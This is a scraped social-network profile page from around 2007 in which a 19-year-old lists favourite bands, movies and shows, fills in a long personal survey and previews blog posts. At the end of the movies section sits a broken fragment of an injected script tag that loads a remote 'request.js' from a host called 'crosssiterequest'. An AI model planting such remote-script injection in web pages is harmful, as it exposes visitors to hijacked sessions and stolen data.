*marissa* profile picture


What we have done for ourselfs alone dies with us; What we have done for others and the world remain

About Me

My name is Marissa and im 19 years old. I just moved back with my parents so i can pay my bills off and move back out. Its so not fun! I work at albertsons and i feel like that is all i do! But when i am Not working i like to hang out with my friends, Party, Drive around with Alicia, I love taking random road trips to the beach, When i am having a bad day i will drive to Bar View jetty and just sit there, I love that! Home | Browse | Search | Invite | Film | Mail | Blog | Favorites | Forum | Groups | Events | Videos | Music | Comedy | Classifieds
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I like alot of different kinds of music mainly Rock music, i love the guitar, though i cant play it i wish i could. i listen to a little rap here and there when i am in the mood . My favorite band would have to be Bush, since i was like 7 years old. Some other bands i like are Smile Empty Soul, Gatsbys American Dream, Hellogoodbye, Emery and This Providence, Hope all is well, Nirvana, Foo Fighters, Marilyn Manson, ICP, MSI, Three days grace, No Doubt, Green day, Weezer, System of a Down, Phantom planet, New Found Glory, Eminem, Good Charlotte, 7mary3, matchbox20,HIM, Metalica, simple plan, gob, Shinedown, Trust Company,Hoobastank, Tom Petty, Papa Roach, Sublime, Butthole surfers, Radio head, Everclear, Yellowcard, The Cars, Mest, Adema, Chevelle, Lincoln Park... i could proabally go one forever and ever so im just going to stop here.
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I pretty much like all kinds of movies, Chick flicks, Horror, Drama, Action, im not really into fantacy like movies. Some of my favorite movies are: Blow, Party Monster, Bourne Identity, Romeo and Juliet, Requim for a dream, The Faculty, Donnie Darko, The Goonies, Pirates of the Carabiean, Grease 2, Cry Baby, Euro Trip, Stand by Me, Shrek, The Princess Bride, American pie, Crazy Beautiful, Johnny Dangeriousy , Butterfly Effect, Empire Records, SAW, The Notebook, Fight Club, CANIBAL! The Musical, The Island, The Bog 1 and The Bog 2, Suicide Kings, Drop Dead fred, Down with love, How to deal, Alot like love, 40 year old virgin, Jarhead, Boggie Nights, Bong Water, house of wax, Jawbreaker, lone star, saved, My best friends wedding, wasted, spun, the good girl,DISTURBIA, ALPHA DOG.... wow! i probally could go on for a long time, but im just going to stop, i think ya get the idea of what kinda movies i like..... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("..1...{}");}..
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I dont really have time to watch that much TV. But the few shows that i do watch are Lost, Greys Anatomy, The OC, Criss Angel, Laguna Beach
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Long Hard Road Out of Hell , Marilyn Manson- Requiem for a Dream, Hurbert Selby Jr.- Party Monster, James St. James- Girl Inturupted, Susana Kaysen- The Notebook, Nicholas Sparks- A Walk to Remember, Nicholas Sparks- ... lots more that i like those are just the ones i can think of****************************************.. width="425" height="350" ..

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The Best Myspace Survey
* . . About You . . *
Eye Color:: GREEN
Hair Color:: RED HEAD
Height:: 5*7
Favorite Color:: ***PINK***
Screen Name:: Cuttiepye930032
Favorite Band:: Gatbys American Dream
Favorite Movie:: Boondock Saints
Favorite Show:: Greys Anatomy
Your Car:: I own a Mercury Tracer. But i wanna get a Mazda RX8 Or a Jeep Wrangler
Your Hometown:: *cough* Aloha....
Your Present Town:: Hillsboro... like its any better
Your Crushes First Name:: ............?
Your Grade:: dont really have one
Your Style:: a little bit of everything all rolled into ONE
* . . Have You Ever . . *
Sat on your rooftop?: not mine personally but i used to at my Grandpas
Kissed someone in the rain?: no
Danced in a public place?: yeah
Smiled for no reason?: all the timne
Laughed so hard you cried?: all the time
Peed your pants after age 8?: probally
Written a song?: hell ya
Sang to someone for no reason?: yeah ive done that before... but only good friends get to hear me sing
Performed on a stage?: yeah
Talked to someone you don't know?: everyday about 2000 times
Gone out of your way to befriend someone?: not really
Made out in a theatre?: no:(
Gone roller skating since 8th grade?: yeah.... Kelli. Tearyawna and i pimped the rollerskates one night at like 2am... and a skateboard
Been in love?: i love everyone... but Love Love.... not really
* . . Who was the last person to . . *
Say HI to you?: Whitney when i walked into Albertsons
Tell you, I love you?: dont know... thats kinda sad.
Kiss you?: im not going to say on this one... i dont kiss and tell LOL
Hug you?: ?
Tell you BYE?: i think whitney when i left Albertsons
Write you a note?: holy crap... a note i have no idea
Take your photo?: Greg, the other night we where watching tv and he decided to take a bunch of random pics of me... i hate having my pics be taken
Call your cell phone?: ha ha ha!!! my phone got shut off...
Buy you something?: ????
Go with you to the movies?: ????
Sing to you?: probally scottie at work, he is always singing to everyone
Write a poem about you?: hmmm.. dont know if anyone ever has... if u have let me see it, im curiouse
Text message you?: JR. He wrote "IM CRAZY" was it a drunkin text... i dont know
Touch you?: i was just playing around with dozer, does that count... he gave me a hug lol
* . . What's the last . . *
Time you laughed?: its been a while
Time you cried?: probally the other day... when i thought if my life could get any worse
Movie you watched?: My Father the Hero
Joke you told?: ??? so there was this blind man right....
Song you've sang?: Gatsbys american dream in the car all night tonight!!!
Time you've looked at the clock?: 1.2 seconds ago
Drink you've had?: a 32oz of Smirdoff at Jenniffers(alchoholic drink) and a Vault about and hour ago
Number you've dialed?: hollywood video, to get a hold of my sis
Book you've read?: Sex drugs and coco puffs. still reading it.... its like a 3 year process
Food you've eaten?: take and bake pizza schmizza
Flavor of gum chewed?: Orbits. the light blue one is the best
Shoes you've worn?: My Doc's
Store you've been in?: ALbertson
Thing you've said?: ill be right there.
* . . Can You . . *
Write with both hands?: yeah... do u have to be able to read it?
Whistle?: ha ha ha NO!
Blow a bubble?: yeah, barrelly
Roll your tounge in a circle?: nope
Cross your eyes?: yeah a little
Touch your tounge to your nose?: nope
Dance?: Everyone can dance, i dont like to
Gleek?: never tryed
Stay up a whole night without sleep?: yeah. i know about those
Speak a different language?: A lil German. Was Macht du in diner friziet?(SP)
Impersonate someone?: yeah
Prank call people?: yeah i can but i dont
Make a card pyramid?: more like a box house
Cook anything?: yeah i can cook if its from a box or bag
* . . Finish The Line . . *
If i were a ...: Monkey i would fly
I wish ...: upon stars but nothing has ever came true
So many people don't know that ...: i hate them
I am ...: AWESOME
My heart is ...: broken and i just dont care
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You've been totally Bzoink*d ..END SO FREAKIN HOTT!!!!!!!!!!!

My Blog

i <3 this song!

Well I been thinking about the future But I'm too young to pretend It's such a waste to always look behind you Should be lookin' straight ahead Yeah, I'm gonna have to move on Before we meet again...
Posted by *marissa* on Wed, 28 Feb 2007 10:02:00 PST

some of these things are so true... LOL

You Know You're From Oregon When... *Your children learned to walk in Birkenstocks. *You throw an aluminum can in the trash and feel guilty.*You complain about Californians as you sell your house to ...
Posted by *marissa* on Tue, 27 Feb 2007 02:37:00 PST

Anna Nicole Smith, Tupac and Elvis are on an island somewhere drinking mijitos!

Hey guys... So this is a conversation chelsea and i had tonight.. about anna nicole... some how it came to this... all i can say is chelsea and i have GREAT BIG IMAGINATIONS!!!!!!marissanicole7410: E...
Posted by *marissa* on Fri, 09 Feb 2007 02:39:00 PST


Hey guys, So i heard this song by Bruce Springsteen and i thought it would be funny to put it on here.. Well because i am a red head*RED HEADED WOMAN* Well brunettes are fine man And blondes are fun B...
Posted by *marissa* on Fri, 26 Jan 2007 02:04:00 PST

to much for me right now!

So i have been stressed out alot laitly, alot of things have been happening to me laitly and lets just say it hasent been my lucky year! At the begining of the year things didnt seem more perfect and ...
Posted by *marissa* on Sun, 19 Nov 2006 02:29:00 PST


So i dont have the internet anymore.... damn comcast shut me off!! i should be getting it back soon though... so this is just an update for everyone! ALOT OF SHIT HAS HAPPEND. but its all just crazy.....
Posted by *marissa* on Mon, 17 Jul 2006 02:33:00 PST

Why the hell am i awake!!

Yesterday was my first day back from vacation... and i thought since i was back to work my sleeping schedule would go back to normal.. But here i am almost 8am and im still awake!!!! it was like that ...
Posted by *marissa* on Tue, 06 Jun 2006 07:52:00 PST


Well i am bored.... so i figured i would give you all an update on my life. So here it is!! Im still living with my sister at the appartment that we got. I am loving it!!! she wants to move out!(so if...
Posted by *marissa* on Sat, 15 Apr 2006 01:15:00 PST


So i have decided that i am completly done with all the stupid people in my life... I am so tired of all your lies.... and your drama.... Ive been done with this kinda shit for only a day... and my li...
Posted by *marissa* on Sun, 02 Apr 2006 03:16:00 PST


So i am at  work.... and i guess talking to this customer and all of a sudden he was like, "you really uptalk!!!!" and i was like excuse me? and he was like "YOU UPTALK" and i just gave him a loo...
Posted by *marissa* on Wed, 22 Mar 2006 12:31:00 PST